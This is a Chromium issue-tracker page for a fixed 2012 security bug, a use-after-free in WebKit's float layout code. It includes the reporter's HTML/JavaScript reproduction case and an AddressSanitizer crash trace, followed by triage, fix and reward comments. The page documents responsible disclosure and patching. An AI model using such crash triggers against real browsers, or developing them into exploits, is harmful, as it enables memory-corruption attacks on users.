New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Apr 2012
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
link

Issue 121899: Security: use-after-free in WebCore::RenderBoxModelObject::hasSelfPaintingLayer()

Reported by miau...@gmail.com, Apr 4 2012

Issue description

VULNERABILITY DETAILS
use-after-free in WebCore::RenderBoxModelObject::hasSelfPaintingLayer()

VERSION
Chrome Version: dev

Chromium	20.0.1092.0 (Developer Build 130586)
OS	Linux
WebKit	536.6 (@113153)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        float: left; 
      }
      #el1 {
        padding-top: 1em;
        padding-bottom: 1em;
        margin-bottom: 1em;
        display: table;
        -webkit-margin-before: -100px; 
      }
    </style>
    <script>
      onload = function() {
        document.body.appendChild(document.createElement('select'))
        el0=document.createElement('hr')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('div')
        el1.setAttribute('id','el1')
        document.body.appendChild(el1)
        el1.appendChild(document.createElement('textarea'))
        el2=document.createElement('div')
        document.body.appendChild(el2)
        el2.appendChild(document.createElement('input'))
        document.body.offsetTop
        document.body.removeChild(el0)
      }
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==28339== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca3eeb8 at pc 0x55555ab913d7 bp 0x7fffffff74a0 sp 0x7fffffff7498
READ of size 8 at 0x7fffeca3eeb8 thread T0
    #0 0x55555ab913d7 in WebCore::RenderBoxModelObject::hasSelfPaintingLayer() const ???:0
    #1 0x55555aab07f4 in WebCore::RenderBlock::addOverhangingFloats(WebCore::RenderBlock*, bool) ???:0

0x7fffeca3eeb8 is located 56 bytes inside of 184-byte region [0x7fffeca3ee80,0x7fffeca3ef38)
freed by thread T0 here:
    #0 0x55555df1f772 in free ??:0
    #1 0x5555592c5e47 in WebCore::Node::detach() ???:0
    #2 0x55555928989d in WebCore::Element::detach() ???:0
 
56184.html
924 bytes View Download
56184.txt
10.2 KB View Download

Comment 1 by infe...@chromium.org, Apr 4 2012

Comment 2 by palmer@chromium.org, Apr 4 2012

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit Mstone-20 SecImpacts-None SecSeverity-High OS-All
Status: Assigned
Ken, can I therefore assign it to you? :) Feel free to punt it right back to me.

I can only repro it on ToT, not 18. It might yet turn out to work on 19, though; I'll try.

Comment 3 by palmer@chromium.org, Apr 4 2012

Owner: kenrb@chromium.org

Comment 4 by kenrb@chromium.org, Apr 4 2012

Another float issue... leave it with me and I'll put it in my queue. I just uploaded to cluster-fuzz to see if we can get a regression range. Crossing my fingers I didn't cause it (which is probably about even odds based on reading the test case).

Comment 5 by kenrb@chromium.org, Apr 4 2012

It's not my regression, but cluster-fuzz isn't reproducing. It might be a special case of the same bug in 106413 that my patch doesn't catch for some reason. I'll have a closer look later on.

Comment 6 by infe...@chromium.org, Apr 5 2012

Owner: infe...@chromium.org
Status: Started
I know what is going wrong here with floats here..stealing... :)

Comment 7 by infe...@chromium.org, Apr 9 2012

Labels: -Mstone-20 -SecImpacts-None Mstone-18 SecImpacts-Stable SecImpacts-Beta
Chris, this easily reproduces under ASAN on m18. We should always try with the memory debugging tool or under chrome without ASAN, please use the --js-flags="--expose-gc" flag to force gc.

Comment 8 by infe...@chromium.org, Apr 11 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/113825

Comment 9 by scarybea...@gmail.com, Apr 23 2012

Labels: -Merge-Approved Merge-Merged reward-topanel
M18: http://trac.webkit.org/changeset/114948
M19: http://trac.webkit.org/changeset/114949

Comment 10 by infe...@chromium.org, Apr 24 2012

Labels: -reward-topanel reward-1000 reward-unpaid
Thanks Miaubiz for helping to cleanse the float bugs. They are nasty. This qualifies for $1000 Chromium Security Reward.

Comment 11 by infe...@chromium.org, Apr 24 2012

Labels: CVE-2011-3081

Comment 12 by scarybea...@gmail.com, May 10 2012

Labels: -reward-unpaid

Comment 13 by cdn@chromium.org, May 15 2012

Status: Fixed
Marking old security bugs Fixed..

Comment 14 by bugdroid1@chromium.org, Oct 13 2012

Project Member
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.

Comment 15 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-WebKit -Mstone-18 -SecImpacts-Stable -SecSeverity-High -SecImpacts-Beta Cr-Content Security-Impact-Stable Security-Impact-Beta M-18 Security-Severity-High Type-Bug-Security

Comment 16 by bugdroid1@chromium.org, Mar 13 2013

Project Member
Labels: Restrict-View-EditIssue

Comment 17 by bugdroid1@chromium.org, Mar 13 2013

Project Member
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue

Comment 18 by scarybea...@gmail.com, Mar 21 2013

Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue

Comment 19 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 22 by bugdroid1@chromium.org, Apr 6 2013

Project Member
Labels: -Cr-Content Cr-Blink

Comment 23 by sheriffbot@chromium.org, Jun 14 2016

Project Member
Labels: -security_impact-beta

Comment 24 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 25 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 26 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 27 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment